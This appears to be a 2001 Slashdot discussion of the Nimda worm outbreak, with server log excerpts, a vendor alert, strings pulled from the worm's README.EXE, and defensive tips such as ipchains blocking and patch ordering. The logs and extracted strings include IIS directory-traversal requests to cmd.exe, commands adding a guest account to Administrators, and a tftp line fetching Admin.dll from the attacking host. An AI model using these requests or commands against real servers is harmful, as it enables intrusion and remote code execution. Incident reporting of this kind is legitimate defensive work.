New (More) Annoying Microsoft Worm Hits Net

A new worm seems to be running rampant Unlike Code Red, it attempts to hit boxes with many different exploits (including what looks like an attempt to exploit boxes still rooted by Code Red). It looks like each IP tries 16 attempts on its neighbors. There is also a new mail worm mailing WAV files or something with bits of what appears to be the registry... it may or may not be related. Got any words on this? Shut down those windows boxes and stop opening attachments. And make that 21. Got another one while writing this story. All my hits are coming from 208.n.n.n (where I am) I'm sure it'll keep moving to nearby boxes. Update: 09/18 16:40 GMT by J : It now has a name: "Nimda." More info here, here, and here.

Here are examples of the requests it's sending:

GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../ ..%c1%1c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir

While writing this story I was hit a total of 4 times, 16 GET attempts per attack. In only 4 minutes. Also of interest, My desktop has now been hit about 500 times today, all from 208.x.x.x IPs. This might be really bad. I still haven't read anything about this anywhere else, so you heard it here first ;)

Update Web servers compromised by this worm apparently attach a "readme.eml" to all web pages served... and due to a bug in IE5, it will automatically execute the file! Yay Internet Explorer!

Bleah...my firewall logs all of this...

[Dimensio]

And it suddenly had to back up once a week after Code Red started thwacking my machine. Perhaps I should write a script to exploit the root-hack and shut down the affected machines so that the local cable circuit won't be clogged with that crap. I can't imagine how bad this will get.

It's not like @Home (in my area) is doing *anything* to stop this. I really think that they should be policing for such disruptive activities and informing their customers when unsecured machines on their network are comprimised.

408 worm too?

[libertynews]

I'm seeing massive numbers of timed out requests on my sytems this morning. It started at exactly 9:06 eastern time.

I checked one of the IPs and it said 'Fuck USA Government, Fuck PoisonBOx' and opened a second window with what looked like a MIME buffer overflow attempt. I run Opera on Linux so it didn't effect me. It looks like we may be getting hit in a shotgun approach. My systems are in the 207.227 range and 208.

Brian

Wrong name

[platinum]

The 208.x.x.x is similiar to Code Red in that it attempts to scan local subnets (I bet you are have a 208.x.x.x IP); therefore, naming it 208 is only good for those in your Class A. We have received attempts from over 100 hosts infected with the Code Red 2 worm, starting from the local class C, then class B, and now class A and others. It appears to be attempting to find rooter servers, for what purpose I can only imagine.

Re:Wrong name

[platinum]

If you try to access a vulnerable server it attempts to send you a 'readme.eml' file with a .wav content type. This file (using strings) appears to contain numerous registry entries plus all the strings used to find and infect other servers.

here's more output

[TheGratefulNet]

www.iitelecom.qc.ca - - [18/Sep/2001:08:10:05 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281

www.iitelecom.qc.ca - - [18/Sep/2001:08:10:05 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291

www.iitelecom.qc.ca - - [18/Sep/2001:08:10:06 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305

www.iitelecom.qc.ca - - [18/Sep/2001:08:10:06 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 322

www.iitelecom.qc.ca - - [18/Sep/2001:08:10:07 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 322

www.iitelecom.qc.ca - - [18/Sep/2001:08:10:07 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c 1%1c../..%c1%1c../winnt/system32/cmd.

Re:here's more output

[cphipps]

...including what looks like an attempt to exploit boxes still rooted by Code Red

Assuming that refers to this:

"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"

then that's an exploit for Code Red II infected machines, not the original Code Red.

Outlook Express 6.0 can prevent spread

[savaget]

With the new Outlook Express 6.0, you can now prevent the user from opening any attchments.

Here is how it is done:

Tools>Options>Security>check "Do not allow attchments to be saved or opened that could potentially be a virus"

Yep, we're seeing them here too.

[Olinator]

David Korpiewski, our Windoze martyr, is hard at work on this one (I Don't Do Windows:-), and had this to say:

Evidence from compromised boxes elsewhere on campus seems to indicate that this bug will create a ton of *.eml files on the computer and they are all about 78k. Wehaven't received an .eml file in hand yet, to view the contents. A variety of .eml files are created, including "desktop.eml", "readme.eml", etc.

A compromised system will attach a readme.eml file to the bottom of all web pages served. This is because there is currently a bug out for IE5 that will auto execute any given .eml file.

More Info

[Nater]

When the dir command succeeds (or rather, when the worm believes it has succeeded), the next request has a tftp command embedded in it which attempts to install a file called Admin.dll. Following that, there is a request for the dll itself, which presumably kick starts the worm.

I'll take a look at Admin.dll later today.

Worm Un-named no longer

[GodHead]

From NTBugTraq

w32.nimda.amm

TruSecure ALERT- TSA 01-023 - W32.nimda.a.mm

[CiaranC]

TruSecure ALERT- TSA 01-023 - W32.nimda.a.mm

Date: September 18, 2001
Time: 1000 EDT

RISK INDICES:

Initial Assessment: RED HOT

Threat: VERY HIGH, (rapidly increasing)

Vulnerability Prevalence: VERY HIGH, effects IIS servers version 4.0,
5.0, and internal networks.

Cost: High, command execution is possible

Vulnerable Systems: IIS 4.0 and 5.0

SUMMARY:
A new IIS worm is spreading rapidly. Its working name is Nimda:
W32.nimda.a.mm

It started about 9am eastern time today, Tuesday,September 18, 2001,
Mulitple sensors world-wide run by TruSecure corporation are getting
multiple hundred hits per hour. And began at 9:08am am.

The worm seems to be targeting IIS 4 and 5 boxes and tests boxes for
multiple vulnerabilities including:

Almost all are get scripts, and a get msadc (cmd.exe)
get_mem_bin
vti_bin owssvr.dll
Root.exe
CMD.EXE
../ (Unicode)
Getadmin.dll
Default.IDA
/Msoffice/ cltreq.asp

This is not code red or a code red variant.

The worm, like code red attempts to infect its local sub net first,
then spreads beyond the local address space.

It is spreading very rapidly.

TruSecure believes that this worm will infect any IIS 4 and IIS 5
box with well known vulnerabilities. We believe that there are
nearly 1Million such machines currently exposed to the Internet.

Risks Indices:
Vulnerability VULNERABILITY PREVALANCE is very high - Milllions of
Internet Web server hosts: TruSecure process and essential
configurations should generally be protective. The vulnerability
prevalence world-wide is very high

Threat - VERY HIGH and Growing The rate of growth and spread is
exceedingly rapid - significantly faster than any worm to date and
significantly faster than any variant of Code red.

Cost -- Unknown, probably moderate per infected system.

The worm itself is a file called
README.EXE, or ADMIN.DLL
a 56K file which is advertised as an audio xwave mime type file.

Other RISKS:
There is risk of DOS of network segments by traffic volume alone
There is large risk of successful attack to both Internet exposed IIS
boxes and to developer and Intranet boxes inside of corporations.

Judging by the Code Red II experience, we expect many subtle routes
of infection leading to inside corporate infections.

We cannot discount the coincidence of the date and time of release,
exactly one week to (probably to the minute) as the World Trade
Center attack .

REPLICATION:
There are at least three mechanisms of spread:
The worm seems to spread both by a direct IIS across Internet (IP
spread)
It probably also spreads by local shares. (this is not known for
sure at this time)
There is also an email vector where README.EXE is sent via email to
numerous accounts.

Mitigations
TruSecure essential practices should work.
Block all email with EXE attachments
Filter for README.EXE
Make sure IIS boxes are well patched and hardened, or removed from
both the Internet and Intranets.
Make sure any developer computing platforms are not running IIS of
any version (many do so by default if either.
Disconnect mail from the Internet
Advise users not to double click on any unexpected attachments.
Update anti-virus when your vendor has the signature.

Some interesting strings from README.EXE

[undie]

Here are some interesting strings found in the readme.exe this worm sends down (some stuff snipped):

Concept Virus(CV) V.5, Copyright(C)2001 R.P.China

SYSTEM\CurrentControlSet\Services\lanmanserver\S ha res\Security
share c$=c:\
user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add
user guest /active
open
user guest /add
HideFileExt

/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../.. %c 1%1c../..%c1%1c..
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
/winnt/system32/cmd.exe?/c+
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
Admin.dll
c:\Admin.dll
d:\Admin.dll
e:\Admin.dll
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
/Admin.dll

qusery9bnow
-qusery9bnow
\mmc.exe
\riched20.dll
boot
Shell
explorer.exe load.exe -dontrunold
\system.ini
\load.exe

if you don't mind a few ipchains rules...

[DirkGently]

...try this. its a pretty quick hack, and you'll need to modify the path to your apache logs in the grep line. but its what I just whipped up. hope its useful. I just ran it and it works for me.

#!/bin/sh

for LUSER in `grep "winnt" /var/log/httpd/error_log | awk '{print $8}' | sed -e s/]//`; do
if [ ! "`ipchains -L -n | grep $LUSER`" ]
then ipchains -A input -s $LUSER -d 0/0 -j DENY
fi
done

Re:unmap your EML file association

[Lxy]

Easier method:
Create a text file and name it something like eml.reg. Right click, select Edit. Paste the following lines into the file:

REGEDIT4

[HKEY_CLASSES_ROOT\.eml]
@="Microsoft Internet Mail Message"
"Content Type"="text/plain"

And save the file. Double click and it will add itself to the registry. This will re-associate the .eml extension with Notepad. NOTE: this may affect Outlook since the .eml is an extension used for mail stores. Use at your own risk.

There are currently 4 known means of propogation

[jedinite]

The best site to track this incident IMO (incidents.org) now has a pretty good picture of what's going on from a technical perspective.

A short summary:

The Nimda worm is now known to propogate four ways:

(1) An IIS vulnerability propagation mechanism where the worm attempts to exploit a large number of IIS vulnerabilities to gain control of a victim IIS server. Once in control, the worm uses tftp to fetch its code in a file called Admin.dll from the attacking server.

(2) Email propogation. The worm harvests email addresses from the address book and potentially the web browser history and sends itself to all addresses as an attachment called readme.exe. These executables are automatically executed if the receipient who opens (or previews) the email is running Internet Explorer 5 or 6. Note that the worm may spoof the source address on the emails.

(3) When a web server is infected, the worm replaces all web pages on the server with a binary encoded as a wav file, which can infect each client that connects to the server. The wav file is called readme.eml. Microsoft Internet Explorer 5.0 and higher will automatically execute the malicious file.

(4) The worm is network aware and propagates via open shares. It will propagate to shares that are accessible to username guest with no password.

See: www.incidents.org/react/nimda.php for the full details.

- YASP (Yet Another Security Professional) who is fighting this pretty heavily at work - nothing here infected, of course, but the traffic itself is threatening to become a pretty nice distributed DOS - our Internet Router (a decently-hefty CSCO 6500-series) is sitting at ~60% processor utilization.

Re:yup!

[weave]

We got nailed. Apparently if you apply hotfixes, patches, SPs in the wrong order, it undoes previous fixes...

Wrong way:
Service Pack 6A
IIS cumulative rollup patch
Post SP6A security rollup patch

Right way:
Service Pack 6a
Post-SP6a Security Roll-up
IIS Cumulative Patch

We thought we were covered. Nope. :-(

(reference, focus-ms mailing list)

URLScan

[Pinball+Wizard]

I just found a very interesting tool at Microsoft's website, UrlScan. It is able to identify malformed requests, and thus is able to prevent against future, unknown worms. It discards the requests before they can be executed.

Anyone know if something like this exists for Apache? A tool like this, if widespread, could effectively contain future buffer-overrun type attacks.